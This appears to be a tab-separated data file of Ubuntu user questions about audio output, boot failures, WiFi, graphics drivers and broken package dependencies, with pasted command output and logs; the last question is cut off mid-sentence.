378592	default playback audio output on xubuntu 13.10	i recently upgraded from xubuntu 13.04 to 13:10 , and since then i have no sound when i start my pc , because it 's being sent to the hdmi output ( my tv ) . i want it to go to the analogue output ( my pc ) like it used to on 13.04 . i can change it using the pulse-audio volume control program , but my settings are lost after i reboot . the pulse-audio volume control does n't have my analogue output as a valid option in the output devices tab ; it appears only after i select analogue stereo within the configuration tab . i then choose it as my `` fallback '' device ( which i think means default device ? ) , but my changes are not saved between reboots . after changing the output device to analogue stereo using the configuration tab , i then have to change the output of the individual program using the playback tab , since it uses the current default ( hdmi ) . i 've tried setting my default audio device using pacmd , but it has n't helped : my analogue device does show up as the active sink when i run pacmd list-sinks , but it 's not the selected device within the volume control ( in the configuration tab ) so i do n't get any sound unless i manually change it . does anyone know how i can preserve my sound settings between reboots ? ===== edit ===== here 's the output of some pactl commands after i start my pc ; the analog stereo source is missing : $ pactl list sources short 0 alsa_input.usb-046d_08b2-01-u0x46d0x8b2.analog-mono module-alsa-card.c s16le 1ch 44100hz suspended 1 alsa_output.pci-0000_00_1b.0.hdmi-stereo.monitor module-alsa-card.c s16le 2ch 44100hz suspended $ pactl list sinks short 0 alsa_output.pci-0000_00_1b.0.hdmi-stereo module-alsa-card.c s16le 2ch 44100hz suspended i then open the pulse-audio volume control and select the `` analog stereo '' item from the configuration tab . running the same commands again gives : $ pactl list sources short 0 alsa_input.usb-046d_08b2-01-u0x46d0x8b2.analog-mono module-alsa-card.c s16le 1ch 44100hz idle 1 alsa_output.pci-0000_00_1b.0.hdmi-stereo.monitor module-alsa-card.c s16le 2ch 44100hz idle 2 alsa_output.pci-0000_00_1b.0.analog-stereo.monitor module-alsa-card.c s16le 2ch 44100hz idle $ pactl list sinks short 0 alsa_output.pci-0000_00_1b.0.hdmi-stereo module-alsa-card.c s16le 2ch 44100hz idle 1 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz idle the analogue stereo source is present and i can hear sound through my pc 's speakers . but when i reboot my pc the settings are lost , and i ca n't find a way to restore them from command line . thanks .
378593	installing lamp	i’m new to linux and ubuntu . i’m running ubuntu 13.10 on a mac os 10.9 machine using oracle’s vbbox vm software . how do i set up the lamp suite of software—linux , apache , mysql , and php ? can you direct me to any online documentation ?
378598	formating ubuntu installer on a usb stick	i have a usb stick with 8 gb and i want to put the ubuntu installer on it . once i am done installing ubuntu on my computer can i format the usb stick so the ubuntu installer is not on there anymore ? if you can please tell me how .
378599	playonlinux can not find curl ( curl )	i made the download from ubuntu software-center , but when i try to start playonlinux i get the answer above . what should i do next ? i 'm using linux the first time in my life.. , please do n't answer in a `` complicated '' way^^ thanks anyway ! p.s . english is not my native language , but i guess it will work out answers are also welcome in german & portuguese^^
378607	unknown event:1	does anyone know what these events in my log could be ? nov 17 23:05:56 aron-lenovo-u410 kernel : [ 10833.396952 ] ideapad_laptop : unknown event : 1 nov 17 23:06:18 aron-lenovo-u410 kernel : [ 10855.853904 ] ideapad_laptop : unknown event : 1 nov 17 23:06:41 aron-lenovo-u410 kernel : [ 10878.776923 ] ideapad_laptop : unknown event : 1 nov 17 23:07:04 aron-lenovo-u410 kernel : [ 10901.327187 ] ideapad_laptop : unknown event : 1 nov 17 23:07:27 aron-lenovo-u410 kernel : [ 10924.195283 ] ideapad_laptop : unknown event : 1 nov 17 23:07:46 aron-lenovo-u410 whoopsie [ 996 ] : online nov 17 23:07:47 aron-lenovo-u410 whoopsie [ 996 ] : online nov 17 23:07:49 aron-lenovo-u410 kernel : [ 10947.040361 ] ideapad_laptop : unknown event : 1 nov 17 23:08:12 aron-lenovo-u410 kernel : [ 10969.765477 ] ideapad_laptop : unknown event : 1 nov 17 23:08:35 aron-lenovo-u410 kernel : [ 10992.652420 ] ideapad_laptop : unknown event : 1 nov 17 23:08:58 aron-lenovo-u410 kernel : [ 11015.555908 ] ideapad_laptop : unknown event : 1 nov 17 23:09:21 aron-lenovo-u410 kernel : [ 11038.260816 ] ideapad_laptop : unknown event : 1 nov 17 23:09:44 aron-lenovo-u410 kernel : [ 11061.037997 ] ideapad_laptop : unknown event : 1 nov 17 23:10:06 aron-lenovo-u410 kernel : [ 11083.875946 ] ideapad_laptop : unknown event : 1 nov 17 23:10:07 aron-lenovo-u410 whoopsie [ 996 ] : online nov 17 23:10:29 aron-lenovo-u410 kernel : [ 11106.802780 ] ideapad_laptop : unknown event : 1 nov 17 23:10:52 aron-lenovo-u410 kernel : [ 11129.768678 ] ideapad_laptop : unknown event : 1 nov 17 23:11:07 aron-lenovo-u410 whoopsie [ 996 ] : online nov 17 23:11:15 whoopsie [ 996 ] : last message repeated 2 times nov 17 23:11:15 aron-lenovo-u410 kernel : [ 11152.496568 ] ideapad_laptop : unknown event : 1
378608	xubuntu xfce power manager show pm icon for wireless mouse	i have just installed xubuntu 13.10 and except for a few things everything is great , but i have a slight problem with the pm icons . the xfce power manager shows one icon for laptop battery and another one for wireless mouse . i think that this is a feature of new version of xfce power manager or some other backend program that it used to gather info about bateries , for some people this might be great and cool , but for me it is very annoying . do anybody know how to get rid of that icon for mouse and have just one icon of power manager only for laptop batery ? thanks
378609	binutils wo n't install	i am trying to build a cross-compiler for i386-elf . i installed bison , flex and texinfo . my system came with gcc , binutils and gnu make installed . i downloaded the source and ran configure . i then ran make and i got this : config.status : creating po/makefile.in config.status : executing depfiles commands config.status : executing libtool commands config.status : executing default-1 commands config.status : executing bfd_stdint.h commands config.status : executing default commands make [ 3 ] : leaving directory `/home/isaac/source/build-binutils/binutils/bfd/po' make [ 3 ] : entering directory `/home/isaac/source/build-binutils/binutils/bfd/po' make [ 3 ] : nothing to be done for `info ' . make [ 3 ] : leaving directory `/home/isaac/source/build-binutils/binutils/bfd/po' make [ 3 ] : entering directory `/home/isaac/source/build-binutils/binutils/bfd' make [ 3 ] : nothing to be done for `info-am ' . make [ 3 ] : leaving directory `/home/isaac/source/build-binutils/binutils/bfd' make [ 2 ] : *** [ info-recursive ] error 1 make [ 2 ] : leaving directory `/home/isaac/source/build-binutils/binutils/bfd' make [ 1 ] : *** [ all-bfd ] error 2 make [ 1 ] : leaving directory `/home/isaac/source/build-binutils/binutils' make : *** [ all ] error 2 how do i avoid this error ?
378610	htc x920d a.k.a htc butterfly	in the near future will you be building unbuntu version for htc x920d aka butterfly
378611	partition not recognized on boot	i re-installed ubuntu on my macbook and now it wo n't boot correctly . in gparted , the partition ( /dev/sda2 ) is recognized but unable to mount . how can i boot ubuntu ?
378616	how can i install ubuntu 13.xx without usb , cd , dvd or net ? ( hard drive only )	i have an older i386 sony vaio desktop pc where the bios only allows boot from floppy , cd or very specific usb device types , none of which seem to recognize usb flash drives for some reason . floppy is not an option because the drive no longer works and i have no media for it if it did . i 've tried assorted cd and dvd drives , the cd drives all give read errors and dvd drives all say `` unsupported emulation '' . my next possible option that i would like to try , is to install the hard drive into another machine as a second hd and figure out a way to format it and save an ubuntu installation to run from that hd once it is moved back into the target machine . is this possible and if so , how would i go about doing so ? the currently running machine uses windows xp .
378620	do i need to type a command in the grub terminal when booting from usb ?	i am trying to install ubuntu 13.10 amd64.iso from usb on my pc . when i boot i enter the bios and select boot from the usb , i get the grub terminal and do n't know where to go ( what to type ) . i expected the installer to open as usual . i have installed ubuntu 12.04 previously with the live cd method , but i currently have no disks . ( note : that was on a old computer ) . i recently installed win7 64-bit on this machine . before doing that i made a partition ( which was for ubuntu ) , before i installed win7 . but now i got round to it . i do n't know what to type in the terminal . i 'm obviously booting from the right device to get the grub terminal . what should i do ?
378621	windows 8 wo n't boot from grub	i just installed ubuntu 13.10 and i got ubuntu working just fine , but when i restart into grub and try to load windows 8 nothing happens , i do n't know what to do . this is a link to my bootinfo summary http : //paste.ubuntu.com/6435004/
378622	bricked laptop in ubuntu 12.04 ; with wifi adaptor	i am using a asus laptop with ubuntu 12.04 . my internal wifi adapter stopped working . so i put in a usb adapter . but then i had two adapters both trying to connect to the same network , from which neither can connect . they keep knocking each other offline . so after doing some research i was went into etc/network/interfaces and changed it . so that wlan0 was manual start instead of auto start . at that point i tried to reboot , and at the splash screen i got a message that the computer was waiting network connection . after a minute or two , that changes to continue booting without correct network configuration . and that 's it , it just sits there , doing nothing . so i boot up with my live cd , and used gksudo nautilus , and went back into the operating system filesystem ( not the filesystem on the cd ) , and corrected the changes made in the interfaces file , then reboot . still the same . continue booting without correct network configuration , error msg . i have went back and verified the corrections i made were accurate against the cd filesystem . so what is happening ? how did i mess up that bad by just adding iface wlan0 inet manual ( from those instructions i found here ) ? i decided that was easier than blacklisting , because well it just seemed easier . just my luck . here are the results of some terminal commands , i got these from booting onto the live cd . i 've also had two adapters plugged in together with no problem , but it kept saying wlan0 connected , wlan1 disconnected etc . until i either get this fixed , or reinstall for all practical purposes it is bricked . i do have the fn+f2 combination , i did n't do that to start with because that also turns off the usb adapter . after turning wifi off , and rebooting still the same thing , here 's the results leaving off the wired ethernet other than just to mention it . also you will notice that the wireless adapters are both the same brand , which is unusual . lspci -nn 02:00.0 network controller [ 0280 ] : ralink corp. rt5390 wireless 802.11n 1t/1r pcie [ 1814:5390 ] lsusb bus 002 device 003 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter sudo lshw -c network * network description : wireless interface product rt5390 wireless 802.11n 1t/1r pcie vendor ralink corp physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 08 : ed : b9:6a:0f width : 32 bits clock : 33mhz capabilities : pm mse pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-23-generic firmware=0.34 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : de800000-de80ffff *-network description : wireless interface physical id : 1 bus info : usb @ 2:1.2 logical name : wlan1 serial : 7c : dd:90:12 : d2 : f2 capabilities : ethernet physical wireless configeration : broadcast=yes driver=rt2800usb driverversion=3.8.0-23-generic firmware=0.29 link=no multicast=yes wireless=ieee 802.11bgn *-network description : ethernet interface pysical id : 0 logical name : eth0 sudo rfkill list all 0 : asus-wlan : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes 2 : phy1 wireless lan soft blocked : yes hard blocked : no
378624	unable to connect wifi and ethernet	i have installed ubuntu on my dell latitude e6400 laptop . however , i am unable to connect either with ethernet or wifi . there are no drivers detected under additional drivers . i enabled networking and created a wireless connection under network connection . however , it did nothing . ethernet shows : wired connection 1 ( 1 day ago ) âwhich was when i installed ubuntu . i also tried : sudo ifconfig eth0 down sudo modprobe -r iwlwifi sudo modprobe iwlwifi 11n_disable=1 but it returns `` probe not available '' .
378633	do i need to do maintenance on ubuntu like you do on windows ?	i am wondering if i need to do things like defragmentation and clear cache , to keep ubuntu running smoothly like that done on windows ?
378638	compiled vim from source , removed via make uninstall now can not apt-get anything ... what to do ?	all apt operations insist on performing apt-get -f install but that does not work in correcting . sudo apt-get -f install only returns the error in the error log : user @ computer : ~ $ sudo apt-get -f remove flashplugin-installer reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . vim-gnome : depends : vim-gui-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ computer : ~ $ sudo apt-get install ubuntu-restricted-extras reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . vim-gnome : depends : vim-gui-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ computer : ~ $ sudo apt-get -f install > vim.log e : sub-process /usr/bin/dpkg returned an error code ( 1 ) user @ computer : ~ $ sudo apt-get remove vim-common reading package lists ... done building dependency tree reading state information ... done package vim-common is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . vim-gnome : depends : vim-gui-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-common ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . user @ computer : ~ $ sudo apt-get -f install reading package lists ... building dependency tree ... reading state information ... correcting dependencies ... done the following extra packages will be installed : vim-common vim-gui-common vim-runtime the following new packages will be installed vim-common vim-gui-common vim-runtime 0 upgraded , 3 newly installed , 0 to remove and 16 not upgraded . 2 not fully installed or removed . need to get 0 b/6,431 kb of archives . after this operation , 23.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 224382 files and directories currently installed . ) unpacking vim-gui-common ( from ... /vim-gui-common_2 % 3a7.3.429-2ubuntu2.1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/vim-gui-common_2 % 3a7.3.429-2ubuntu2.1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/gvimtutor ' , which is also in package src 20131114-1 unpacking vim-common ( from ... /vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/xxd ' , which is also in package src 20131114-1 unpacking vim-runtime ( from ... /vim-runtime_2 % 3a7.3.429-2ubuntu2.1_all.deb ) ... adding 'diversion of /usr/share/vim/vim73/doc/help.txt to /usr/share/vim/vim73/doc/help.txt.vim-tiny by vim-runtime' adding 'diversion of /usr/share/vim/vim73/doc/tags to /usr/share/vim/vim73/doc/tags.vim-tiny by vim-runtime' dpkg : error processing /var/cache/apt/archives/vim-runtime_2 % 3a7.3.429-2ubuntu2.1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/vimtutor ' , which is also in package src 20131114-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) dpkg-divert : warning : files list file for package `vim-runtime ' missing , assuming package has no files currently installed . removing 'diversion of /usr/share/vim/vim73/doc/help.txt to /usr/share/vim/vim73/doc/help.txt.vim-tiny by vim-runtime' dpkg-divert : warning : files list file for package `vim-runtime ' missing , assuming package has no files currently installed . removing 'diversion of /usr/share/vim/vim73/doc/tags to /usr/share/vim/vim73/doc/tags.vim-tiny by vim-runtime' errors were encountered while processing : /var/cache/apt/archives/vim-gui-common_2 % 3a7.3.429-2ubuntu2.1_all.deb /var/cache/apt/archives/vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb /var/cache/apt/archives/vim-runtime_2 % 3a7.3.429-2ubuntu2.1_all.deb
378650	write list of packages installed via manual invocation of apt-get to file	i 'm trying to install a new version of ubuntu from scratch , but i would like a list of the packages which i manually installed ( as opposed to installed as a dependency or that came with the system ) . i can get a reasonable approximation on synaptic by looking at only my installed ( manual ) packages and then only looking at those packages not supported by ubuntu ( i.e . all those files without the ubuntu unity symbol next to them ) . however , i can not seem to get synaptic to export a list of these packages . hence my question is whether it is possible to generate a list of packages that were installed manually via the apt-get install command ? the following do not work : using apt-mark showmanual . it yields all packages deemed essential as well as manually installed packages . i only want my manually installed packages . aptitude search ' ! ~m ~i ' . there are way too many packages that are being shown ( no way i manually installed > 1000 packages ) . the python script given by @ txwikinger in generating list of manually installed packages and querying individual packages . there are packages ( such as bsdgames ) which i installed , but do not show up in the output of that script . the bash script given by @ johan in http : //serverfault.com/questions/133681/generating-a-list-of-installed-packages-in-ubuntu . once again too many packages are shown . this question is similar in flavor to other questions that have been asked both on stack exchange sites and elsewhere ( such as generating list of manually installed packages and querying individual packages , http : //serverfault.com/questions/133681/generating-a-list-of-installed-packages-in-ubuntu , and http : //ubuntuforums.org/showthread.php ? t=947865 & page=2 ) . david kalnischkies on http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=727799 gives some perspective as to why pinning down exactly what `` manually installed '' means is difficult ( e.g . do programs which you ran which installed packages count as `` manually installed '' ? ) . therefore i have specifically limited this question ( unlike the others that i listed ) to only invocations of apt-get install . edit : how to view a list of packages that were manually installed without their dependancies has a nice idea for using the log files of apt-get to do this . unfortunately this does n't keep track of which packages have been removed . and even if i were to simply grep 'apt-get purge ' and take the diff of the two lists that i get it still would n't account for the edge case that i 've installed a package , uninstalled it , and then reinstalled it .
378654	trouble installing ubuntu onto an older intel pentium 4 machine	i am completely new to linux and that is why i am trying to do is set up an older pc with a 32bit version of ubuntu . this computer has an intel 4 cpu 3.20ghz , dram 400mhz , 1024 mb ram . the issue i am having is at the initial startup of the computer . i get a screen which displays the following : isolinux.bin missing or corrupt . intel ( r ) boot agent fe v4.1.16 intel ( r ) boot agent pxe base code ( pxe-2.1 build 084 ) copyright ( c ) 1997-2004 , intel corporation pxe-e61 : media test failure , check cable pxe-m0f : exiting intel boot agent . no bootable device -- insert boot disk and press any key i have tried making several copies of the iso disk and different versions of ubuntu ... nothing has helped . i am open to any suggestions .
378655	fail to setup dual monitor in ubuntu 13.10 with nvidia gtx 780	i 'm having problem with setting dual monitor in ubuntu 13.10 with my newly acquired nvidia gtx 780 . the two screens i have are : //i wo n't identify the model name since i think its irrelevant left screen : asus 1920x1200 connected to hdmi on gtx 780 right screen : qnix 2560x1440 connected to dual link dvi on gtx 780 both screen works perfectly after fresh ubuntu installation , without installing any additional driver . just slow and laggy . the first thing i 've tried is to install the official nvidia driver from their site . i believe it was version 325 . i followed the on screen instruction and successfully installed it . after reboot , asus ( left ) works with login screen but qnix does n't . it shows a continuously flashing black , white , r , g , b , grey screen . the setting in displays shows asus identified as `` ancor communications inc 25 '' '' while the qnix is `` unknown display '' . resolution settings is only set to 800x600 on the qnix . then i tried to uninstalled the nvidia 325 driver and revert back to stock driver , and install the 319 driver from `` settings '' - > `` software & updates '' - > `` additional drivers '' . but things started to get messed up . black screen etc . i think it may be caused by me messing up with the /etc/x11/x.org.config and not doing a sudo apt-get purge nvidia* so i reinstalled ubuntu 13.10 and tried the additional driver update with nvidia 319-update to see if it works . but the same thing happened as the installation of 325 driver . left screen works and right screen flashing colors . i have tried to search for a solution but failed to find one that works for me . is it a problem of the x.org.config file ? ( i have a feeling it does ) any help plz . update 1 : xrandr shows the following results . do n't know if it matters . screen 0 : minimum 8 x 8 , current 2720 x 1920 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected primary 1200x1920+0+0 left ( normal left inverted right x axis y axis ) 550mm x 340mm 1920x1200 60.0*+ 1920x1080 59.9 50.0 60.0 50.0 1680x1050 60.0 1440x900 59.9 1440x576 50.1 1280x1024 75.0 60.0 1280x960 60.0 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 50.1 720x480 59.9 60.1 640x480 75.0 72.8 59.9 59.9 dp-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 connected 800x600+1920+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 800x600 60.3*+ dp-1 disconnected ( normal left inverted right x axis y axis )
378656	why is n't ubuntu recognizing my graphics card ?	i have a built-in graphics card , a via/s3g unichrome pro igp . ubuntu does n't seem to recognize it , and because of that my computer runs really slow . how do i correctly configure my graphics card for use with ubuntu ?
378657	ubuntu asks me to log in over and over	i 'm brand new to ubuntu and i was trying to get multiple monitors to work . after messing around in the nvidia settings , i tried restarting lightdm and it made a noise and prompted me for my password . when i typed it in , it made a noise again and prompted me for my password again . and again , over and over . i thought it might have been because i ran `` sudo lightdm restart & '' . i restarted my computer but when it came back up , it was still doing this . i can get at the command prompt but i ca n't get at the ui/x-server ( still learning the terminology ) . how can i log in and actually get at the ui again without it just restarting immediately ?
378661	any command line calculator for ubuntu ?	i am looking for a calculator which can do calculations in the terminal itself without any other extra prefixes and suffixes . for example : if i typed something like 10000-9000 in the terminal , the answer should come out as 1000 . once again i am saying , i just need a quick calculator in terminal , without any characters added . i know if i switch to python , it can do that but i do n't want it in such a way .
378671	why ubuntu 12.04 randomly loads in fail-safe graphic mode ?	my ubuntu+nvidia randomly shows `` the system is running in low-graphics mode '' . but after restart , booted-up normally . i found some solutions but no one reports this message shows-up randomly . so my question is : how can i trace and find the problem ? when some issues ( like this ) brings sometimes ?
378672	nvidia glx driver missing extension `` nv-glx ''	i 've been trying to get opengl to work on aws with the new servers for the last two weeks off and on . i 've tried various things i 've found across the web . installing driver 3.19 , reinstalling the current driver , etc . i 'm on ubuntu 12.04lts . i 'll attach the xorg log and conf . xorg.conf : pastebin xorg.0.log : pastebin before the new gpus we had this all wrapped up nicely in some puppet/vagrant scripts to install everything automatically . i 've tweaked the installation scripts a bit to account for the new configuration . i can provide those as well but it 's quite involved . it may be best to assume i 've done nothing and i can provide output of commands as requested . i 'm not a systems person at all so i 'm struggling with making dependencies work and what not using apt-get . i ca n't figure out why this message appears although i 'm pretty sure i have installed the right drivers and configure x correctly . xlib : extension `` nv-glx '' missing on display `` :0 '' .
378673	conflicting libraries in /usr/local/lib and /usr/lib/x86_64-linux-gnu	so i manually installed the latest ffmpeg a while ago , because one of my projects needs the latest .55 ffmpeg libraries ( i think i used this : https : //trac.ffmpeg.org/wiki/ubuntucompilationguide ) . so now in /usr/local/lib , i have : /usr/local/lib/libavcodec.a /usr/local/lib/libavcodec.so /usr/local/lib/libavcodec.so.55 /usr/local/lib/libavcodec.so.55.38.101 the problem is that in /usr/lib/x86_64-linux-gnu , i have : /usr/lib/x86_64-linux-gnu/libavcodec.a /usr/lib/x86_64-linux-gnu/libavcodec.so.53 /usr/lib/x86_64-linux-gnu/libavcodec.so /usr/lib/x86_64-linux-gnu/libavcodec.so.53.35.0 when i compile my code , i get this linker error : /usr/bin/ld : warning : libavcodec.so.55 , needed by /usr/local/lib/libopencv_highgui.so , may conflict with libavcodec.so.53 /usr/bin/ld : obj/h264_decoder.o : undefined reference to symbol 'avcodec_free_frame @ @ libavcodec_55' /usr/bin/ld : note : 'avcodec_free_frame @ @ libavcodec_55 ' is defined in dso /usr/local/lib/libavcodec.so.55 so try adding it to the linker command line /usr/local/lib/libavcodec.so.55 : could not read symbols : invalid operation collect2 : ld returned 1 exit status if i get rid of the conflicting library files in /usr/lib/x86_64-linux-gnu , then my code compiles with no errors . however , then other programs ( e.g . the movie player ) stop working . what 's the best way to solve this problem ?
378674	wifi stopped working after ubuntu update on dell latitude d620	my wifi stopped working after i got the new ubuntu update..ive tried a few of these codes already but im not making any progress . can someone just help me start at step 1 and get this thing fixed ?
378676	rollback dual boot on windows8	i successfully installed ubuntu 12.04 as a dual boot with windows8 on an asus zenbook for my mother . and it defaults to ubuntu on the opening screen . she asked me to disable it so that the computer boots directly back into windows 8 for the time being . for the life of me , i ca n't remember how i got this to work and have less of a clue how to roll it back easily so that it boots directly back into windows 8 for her . i feel like i 've tried everything in the bios screen , but clearly i have n't . please help
378677	problem booting from usb on windows 8 hp	i have a windows 8 hp and i cant get it to boot from the usb . i have disabled the secure boot option and my computer says `` error booting from location '' . ( or something similar ) i am not sure what else to do . i am using a sandisc usb and have a hp pavillion running windows 8.1
378678	how can i access my ntfs files from other drives	i just installed the ubuntu 12.04 lts . i previously had windows 7 , the mistake i made was i just did not put the data i need on my hard drive anywhere else . i just did not think of it before doing it . but when i installed the ubuntu , i just used the drive that i used previously for windows 7 , and chose the option of `` do not use this drive '' for my other drives . so , my data is all there , i know and i want to recover the data on those drives . i used some recovery softwares in the past to recover deleted data ! but most of the data would be in bad shape even if just recovered it moments after i deleted it . any suggestions as to recover the data without much mess !
378679	can juju connect services that are in different environments ?	background : i 'm trying to get openstack working with juju . i 'm testing it , so i either have to use kvm virtualization or lxc because i only have one ( powerful ) machine . i would prefer to use lxc because it 's lighter and faster . but some openstack charms need to format /dev/sdb or insert a kernel module or mount a drive , and will fail to deploy in lxc . so , is it possible to deploy some openstack services in lxc and some on kvm virtual machines that are managed by maas and add relations between them ?
378683	i installed ubuntu 13.10 and wiped the windows 8 that was on the laptop . it installed fine but now it wo n't boot up . please help !	i got tired of windows 8 so i installed ubuntu 13.10 and it installed fine but now when it boots up i get an error saying there was some failure and to insert the boot disk in the proper drive and reboot . i have a cd and a usb with it on but it wont boot to either . right now the computer is dead it either gives that message if i set the bios to csm boot or if i set it to uefi then it gives a blank screen and just sits there . how can i fix this ?
378686	error in updating : installed packages with unmet dependencies .	i am new to linux . the ubuntu version installed is : ubuntu 12.04 lts here is the issue i am having : on the top of my toolbar , i have a red circle indicator and it displays the following error : an error occurred , please run package manager from the right-click from the right click window or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that you have > installed packages with unmet dependencies . i tried to look up some solutions online and i found a few . one of the solutions i attempted was the following : sudo apt-get clean sudo apt-get update sudo apt-get upgrade -f it took my system approximately 20 minutes to run through the code above . after everything completed , it displayed the following : errors were encountered while processing : libqt4-network libqt4-xmlpatterns libqtgui4 libqt4-declarative libqt4-opengl libqt4-svg checkbox-qt ubuntu-desktop i have no idea what the above means ; therefore , have no clue how to resolve the issues . now when i open ubuntu software center to try to install synaptic it says items can not be installed or removed until the package catalog is repaired . do you want to it now ? when i click repair , it says package operation failed and says this . installarchives ( ) failed : dpkg : dependency problems prevent configuration of libqt4-network : libqt4-network depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-dbus on system is 4:4.8.1-0ubuntu4.4 . libqt4-network depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqt4-network ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xmlpatterns : libqt4-xmlpatterns depends on libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-network is not configured yet.no apport report written because maxreports is reached already libqt4-xmlpatterns depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqt4-xmlpatterns ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-declarative : libqt4-declarative depends on libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-network is not configured yet . libqt4-declarative depends on libqt4-script ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-script on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-sql on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-xmlpatterns is not configured yet . libqt4-declarative depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-declarative ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of checkbox-qt : checkbox-qt depends on libqtgui4 ; however : package libqtgui4 is not configured yet . dpkg : error processing checkbox-qt ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on checkbox-qt ; however : package checkbox-qt is not configured yet . dpkg : error processing ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libqt4-network libqt4-xmlpatterns libqtgui4 libqt4-declarative libqt4-opengl libqt4-svg checkbox-qt ubuntu-desktop dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqtcore4 ( = 